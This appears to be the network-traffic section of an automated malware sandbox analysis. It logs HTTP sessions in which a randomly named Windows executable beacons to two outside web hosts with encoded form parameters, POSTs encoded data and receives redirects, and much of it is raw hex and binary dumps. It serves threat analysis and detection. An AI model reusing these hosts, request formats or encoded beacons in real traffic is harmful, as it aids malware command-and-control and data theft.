                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeOYB29qGMJlfbn9pO/bkGeK6Rx38+43oOkL83uyTpqJYTGZmePsB3zHxmoiyHH8IFMKMj/djyNYKZfqqGP93uvrtESrHTBosDhYonNjakRdpiwOx9cXq/nx2frTl3GzSs/rb1tISX6ym8KY5rL9SxFCRk5DEaLQ9hVRw0l7CHfRmdBI0Brqz9+GwASQkwsnTBLRayXOdRPeGq5BPAkPgjSMaxvl0M8Pw5VuuZBGHoE7hCWlGCF5Mq2EmC+CMocLtOnHS+L78UmKjSp0PiFLDFhbXrEY4eWruLXjWSt+OTHVZbnWMJop0FdS8J5XwK28zOFcTHGv2Nj02EuDT8bbiqB8BNb6Ht+YN3OTZPG2+L9UFfHY6iC5qA1PEJ45e9ALeyG+N4EZOujzaHK0gJx+m4d/aYqnHed5Rlg4vhrLyl5JOeTTH2VO+tYRyUbFRSO0LkbxFCGY6hj+TfnBRd3z0rPca5+qJASmnWt7iWXtmVntmoIx/CaCSfk+loUMs2+tVACh6wpvH7KMhIhC8ynlLbdxb3IHuw7poGn7u4QOhakPbPEPuJsxwp+QNdytMZW0LKUHRYYwnQ1i3XcL12/iKP8+HjBttWn30xUh1bqDc68cLlqwadJBWYJEF2qE8LHG+7VUVbgmnOx55zKdOkB0vY50Q7ABCpR6RVvjRXFeJufG3bPTpDLqSCnB/W39cmTPt5dfULlkZ6E6wW2skULXcpx64lndCu7T0dqfT0ivjnSOvTHLUWe+/ZiW7Z7Zn/M5QiTvcZhVWfDHbChaNtfhWxexwYBnE55j2Vx6IW4g8b02fbIS/bGmCeNhxO4GilG6ZdY+eMew939MwLM4A38rVoQSWF20js+s7n+uCUysLhxXU5IShEKhqltlZIntsEtpfJnGo82mVWDDWwB7lCCr3xdp//MphOcVBO+W1Z/eRA7iqEaoVnZdD5fRT5PiJkUS9vu7kbo/rnWoswEAIdWt+Cddgws355VFOs1g [TRUNCATED]
                                                            Aug 28, 2024 14:03:30.124651909 CEST1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:29 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:30.124731064 CEST1236INData Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:30.124738932 CEST1236INData Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:30.125181913 CEST1236INData Raw: ef 16 93 75 82 e0 d3 0a 5c c9 46 20 e7 07 53 84 ca 72 37 f7 7d 99 61 2a 02 c4 56 30 d8 9d e4 aa ef ff 95 1c 62 a3 a7 61 67 b0 b9 e6 60 79 33 e5 c2 36 54 ef 19 14 7a 29 c2 25 6e a0 d0 94 43 a4 0d 73 42 ab 30 57 16 dc 6b 91 66 da 38 a6 dc 0e c9 7d
                                                            Data Ascii: u\F Sr7}a*V0bag`y36Tz)%nCsB0Wkf8}SuaA&F5=F.c:u'4UTEw7k{+M31"{:s+n>$TXOeW6La%/^%68D0HJ
                                                            Aug 28, 2024 14:03:30.125189066 CEST1236INData Raw: 36 e1 27 41 70 11 8d d8 a0 fa 99 52 13 8f c2 a0 d9 e9 f6 9b 9d cb f3 7d 59 9c 99 5b 30 b4 13 78 b8 f3 11 eb 3c 9a b8 02 0e 2e 9a 9d f3 c7 f2 bb 05 f0 19 bb bc 78 34 71 09 7c 85 d8 bd b3 cd f4 d2 22 b4 d8 2a 1d eb 28 b7 61 37 bb 2b 33 4a f5 ec 4c
                                                            Data Ascii: 6'ApR}Y[0x<.x4q|"*(a7+3JLE0,x{6f[}.K3=?#u2wBshwV1Au0$i5rc@r`7hQt+>JsT*)c(ZFZ>Ca36v9|;~;~G:!e
                                                            Aug 28, 2024 14:03:30.125195026 CEST1236INData Raw: 08 4e 0d 70 cc 8b c6 5d e8 42 75 9e cc d1 39 3a b7 8b 02 6d 98 8a 4b 0e e7 57 fb c6 da aa 61 e9 08 8c 2f 89 46 fb 4b 44 9c 38 d4 00 fd 5e a8 82 e9 17 23 1e 8d ce 0e b1 7f 90 1e 04 3c b8 dc f6 c8 a6 28 4b b1 3d fb 4b e0 9d 71 74 08 7b 33 3b 38 bf
                                                            Data Ascii: Np]Bu9:mKWa/FKD8^#<(K=Kqt{3;8Yn2SFg3B+o7GZ9Ns8;$0W+IEH-yg>:;mq3KZYU;3q#V?ovniSw
                                                            Aug 28, 2024 14:03:30.125873089 CEST1236INData Raw: 27 25 84 75 33 09 94 c6 52 8f 98 44 04 ad 1c 28 47 ad f8 00 08 d4 45 88 41 65 e2 54 70 58 64 75 ba 97 3e 8d dc 87 d3 04 0c d4 47 9a cf 1a d8 20 65 26 16 2a 24 01 3e b5 10 c2 0a 07 74 24 75 74 6b f1 35 63 9c fb 6d 3b 8d 8c 27 cc d4 1f b4 f1 1c 71
                                                            Data Ascii: '%u3RD(GEAeTpXdu>G e&*$>t$utk5cm;'quNcithQf(ZAB"i1)b5\$1bD>'/iS^p[VW2\3T\[Rfhf:zEwmnLhn V7MU{K0.5@qa
                                                            Aug 28, 2024 14:03:30.125880003 CEST1236INData Raw: 6e 05 46 c6 24 d0 0c 1d 79 24 ce 2a bf 02 6b 22 70 6f d4 00 3f 12 6b 95 5f 81 25 f3 54 28 9d 2f 41 b5 61 2a 3e 76 d6 ca da c7 7b 30 b4 b9 79 5e 8b a2 b4 aa 83 88 13 87 eb 03 50 e5 42 8f 44 df 2a db ab f5 93 91 b7 cb f6 39 62 e9 be 63 25 7f 58 b4
                                                            Data Ascii: nF$y$*k"po?k_%T(/Aa*>v{0y^PBD*9bc%XSaf@"}'`nJ3#q.8{*ZEcg,;2}?-#t4*gJ\v]=B+fLc.lBcfd4>IP14tZTt+
                                                            Aug 28, 2024 14:03:30.125885963 CEST1236INData Raw: e6 b3 07 2c 22 c9 d2 ac 1e b4 2e 2f ce 70 e4 26 59 9e c8 17 a4 5e ef 4c a6 84 62 a8 8b 81 06 f9 1c 4f 67 fd 6e a3 49 3a 65 64 81 e3 66 12 81 94 36 c8 b9 0c 4d 41 c4 89 0b c9 79 10 1c 33 02 61 8b c7 50 69 57 df 5d 64 a3 d1 98 3b b8 73 94 43 a4 0d
                                                            Data Ascii: ,"./p&Y^LbOgnI:edf6MAy3aPiW]d;sCsB+O9b^,<(7R{FLFc#$0K.ncspxI1HMyLgzbm.M,D<e&4*I:3-3
                                                            Aug 28, 2024 14:03:30.126523972 CEST1236INData Raw: 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63 f9 17 77 a9 c4 27 e1 24 be fd fc f6
                                                            Data Ascii: ^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+qfi]
                                                            Aug 28, 2024 14:03:30.130285025 CEST1236INData Raw: d7 94 92 3f 6b 1d 4b 20 bf b0 98 fc c0 14 8b c1 90 ba d2 36 32 22 73 0d 42 e9 cd 1f 4e ae 97 f7 9b 6b 31 36 2c 05 82 e2 0c 6b 5e 18 8b ca 4c a7 d3 56 5c a0 38 16 a7 25 46 a1 90 b2 ad c4 a5 f2 8f 82 0f ff fc cb 0f f4 af fd 9f be fe b7 9f bf fe be
                                                            Data Ascii: ?kK 62"sBNk16,k^LV\8%FPXjd*KS1aHHfa"8Un$ro|REt$utkK5:H&f8C2)6::6V8Y:bQQqfXP1:we&pLZHNga7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449749162.241.2.9280792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:31.990175009 CEST516OUTGET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:03:32.616626024 CEST555INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:32 GMT
                                                            Server: nginx/1.23.4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://vendasnaweb1.com/jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            X-Server-Cache: true
                                                            X-Proxy-Cache: MISS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.4497505.78.41.17480792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:42.643485069 CEST779OUTPOST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 68 4f 6b 4e 66 45 31 58 39 65 41 57 30 6d 70 31 70 4f 75 65 63 61 76 52 65 51 59 37 46 39 73 6d 51 4c 30 59 45 32 48 6c 38 45 6b 37 76 7a 5a 64 64 51 38 64 73 54 45 39 54 65 78 43 4d 66 6f 79 5a 61 72 33 42 6e 4a 65 62 53 65 6d 77 34 57 66 42 78 57 37 49 78 54 32 4d 67 67 79 71 2b 64 6b 59 38 59 32 32 67 70 2f 49 6e 53 5a 35 6d 57 65 58 45 78 53 61 59 30 49 68 4c 32 44 57 37 2f 30 56 50 44 6c 42 35 74 62 6c 6b 4b 71 34 61 7a 6c 4c 5a 39 61 48 6a 34 70 54 6c 6a 4d 49 36 77 79 51 58 30 33 77 76 42 52 77 79 53 53 41 2f 42 2b 4a 41 53 4a 51 3d 3d
                                                            Data Ascii: 4NZpb=9nNBkBsNoW75xhOkNfE1X9eAW0mp1pOuecavReQY7F9smQL0YE2Hl8Ek7vzZddQ8dsTE9TexCMfoyZar3BnJebSemw4WfBxW7IxT2Mggyq+dkY8Y22gp/InSZ5mWeXExSaY0IhL2DW7/0VPDlB5tblkKq4azlLZ9aHj4pTljMI6wyQX03wvBRwySSA/B+JASJQ==
                                                            Aug 28, 2024 14:03:43.242506981 CEST516INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.4497515.78.41.17480792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:45.172820091 CEST799OUTPOST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 42 2b 6b 49 38 38 31 41 4e 65 44 54 30 6d 70 67 35 4f 71 65 63 47 76 52 66 55 49 75 6a 46 73 6f 51 62 30 5a 47 4f 48 69 38 45 6b 6a 66 7a 59 51 39 51 31 64 73 66 69 39 52 4b 78 43 4d 4c 6f 79 59 71 72 33 54 50 4b 63 4c 53 59 74 51 34 75 62 42 78 57 37 49 78 54 32 4d 6c 33 79 71 6d 64 6b 72 55 59 30 58 67 71 2b 49 6e 52 59 35 6d 57 49 6e 45 31 53 61 59 61 49 6c 4b 72 44 55 44 2f 30 51 72 44 68 44 51 37 53 6c 6b 45 33 49 61 6b 74 65 41 76 56 53 58 7a 67 43 52 41 54 70 57 32 33 57 47 75 6d 42 4f 57 44 77 57 68 50 48 32 31 7a 4b 39 62 53 51 49 52 2b 73 35 67 6b 4b 59 44 4a 34 57 77 6e 49 43 37 6f 37 30 3d
                                                            Data Ascii: 4NZpb=9nNBkBsNoW75xB+kI881ANeDT0mpg5OqecGvRfUIujFsoQb0ZGOHi8EkjfzYQ9Q1dsfi9RKxCMLoyYqr3TPKcLSYtQ4ubBxW7IxT2Ml3yqmdkrUY0Xgq+InRY5mWInE1SaYaIlKrDUD/0QrDhDQ7SlkE3IakteAvVSXzgCRATpW23WGumBOWDwWhPH21zK9bSQIR+s5gkKYDJ4WwnIC7o70=
                                                            Aug 28, 2024 14:03:45.776526928 CEST516INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.4497525.78.41.17480792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:47.705670118 CEST10881OUTPOST /hxac/ HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.411divorce.com
                                                            Referer: http://www.411divorce.com/hxac/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 39 6e 4e 42 6b 42 73 4e 6f 57 37 35 78 42 2b 6b 49 38 38 31 41 4e 65 44 54 30 6d 70 67 35 4f 71 65 63 47 76 52 66 55 49 75 6a 4e 73 6f 6a 6a 30 59 68 69 48 6a 38 45 6b 71 2f 7a 46 51 39 52 33 64 6f 7a 6d 39 52 57 4c 43 49 37 6f 30 36 69 72 6e 79 50 4b 57 4c 53 59 69 77 34 56 66 42 77 4f 37 49 42 4d 32 4d 31 33 79 71 6d 64 6b 75 51 59 69 57 67 71 38 49 6e 53 5a 35 6d 4b 65 58 45 64 53 61 51 73 49 6c 66 63 41 6c 6a 2f 31 77 37 44 6a 57 6b 37 50 56 6b 47 30 49 62 68 74 65 46 78 56 55 79 4b 67 43 6c 36 54 71 4b 32 33 77 72 72 38 46 37 4a 64 7a 43 59 66 47 47 2f 32 5a 74 45 61 41 45 4c 7a 4d 5a 68 36 2b 6f 61 4b 62 76 33 79 37 32 6f 37 62 44 52 32 71 71 56 7a 77 36 50 2b 68 61 2f 58 66 45 48 4f 55 6c 47 6d 50 34 4b 76 5a 7a 4f 51 76 45 68 31 68 79 5a 36 48 33 51 64 37 68 52 4b 52 31 4a 35 34 39 53 71 31 72 75 46 45 6b 59 51 72 68 6f 61 65 6a 57 47 6f 70 70 39 30 6f 62 6c 74 6f 73 62 62 33 7a 37 51 52 45 66 53 44 43 64 6d 50 75 47 2f 77 59 36 72 43 78 35 6c 2b 4d 46 62 70 5a 4f 54 31 34 [TRUNCATED]
                                                            Data Ascii: 4NZpb=9nNBkBsNoW75xB+kI881ANeDT0mpg5OqecGvRfUIujNsojj0YhiHj8Ekq/zFQ9R3dozm9RWLCI7o06irnyPKWLSYiw4VfBwO7IBM2M13yqmdkuQYiWgq8InSZ5mKeXEdSaQsIlfcAlj/1w7DjWk7PVkG0IbhteFxVUyKgCl6TqK23wrr8F7JdzCYfGG/2ZtEaAELzMZh6+oaKbv3y72o7bDR2qqVzw6P+ha/XfEHOUlGmP4KvZzOQvEh1hyZ6H3Qd7hRKR1J549Sq1ruFEkYQrhoaejWGopp90obltosbb3z7QREfSDCdmPuG/wY6rCx5l+MFbpZOT14cnU/qIvL6gMgZ7cMJf5+4/mjav1m7pLNjpRbBK5nca0/jPylx32PvMb3uDOgn1XJtFKJfPYEgNL9b84R0uPu38lklWUYNvYlmrKS+1jN7OabYaYoYquO2CBnsdjymcRfrdY4tC51wiEgWynbxzvNqTqfuhWs7E8hTJ34ouEn7bDialSgwhW+dvNdgyRSxWzFowoqq9e4o6ZB9kHPjk/AoHgiSjjXTklPUnO6noeUK+pnmDrQ0yu8nE5dmIAP3OJOKLRJVbjPvSVCBE8sEhAAVUwmUcD2vOR9U8nnPiap8K5nBAvlU/vrRqHpRFuGM1tkIj6ju7VtUkq1yag/4O38bgywvSR3/FkO7g2C0ogMrBGtQKAgjF8kT9NEnf+v4n9PpXLZsBn4njCQ8C/B376U941CN5Yr9SgXauBXHxQXgwwewbyICr7AVzGLiYXPQcriYhN+Zorg5UEWZEHuAgdwLFoKwJdPUmv9b4ggREpbozQXaQyJqdT9yBr1tRF+7qxEDc+Jl+NsllQ0foO2Wtq9bB5BBS3yVc7+PNv5s8qPSO+1y0KBkEQjRilsXRc35fAM62yCYDNE9ISt+ZAjkWhTLHzn9Loh3OfmCmPI39YU/+AeR+0NGgLq9Vpf7RsakRSnCploXxAi7ySGMEx2tjBfagBlq/HXyQamlT [TRUNCATED]
                                                            Aug 28, 2024 14:03:48.309449911 CEST516INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.4497535.78.41.17480792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:50.239435911 CEST514OUTGET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1
                                                            Host: www.411divorce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:03:50.835014105 CEST662INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:03:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.411divorce.com/hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4=
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: Prometheus
                                                            Pre-Cognitive-Push: Enabled
                                                            Quantum-Flux-Capacity: Omega
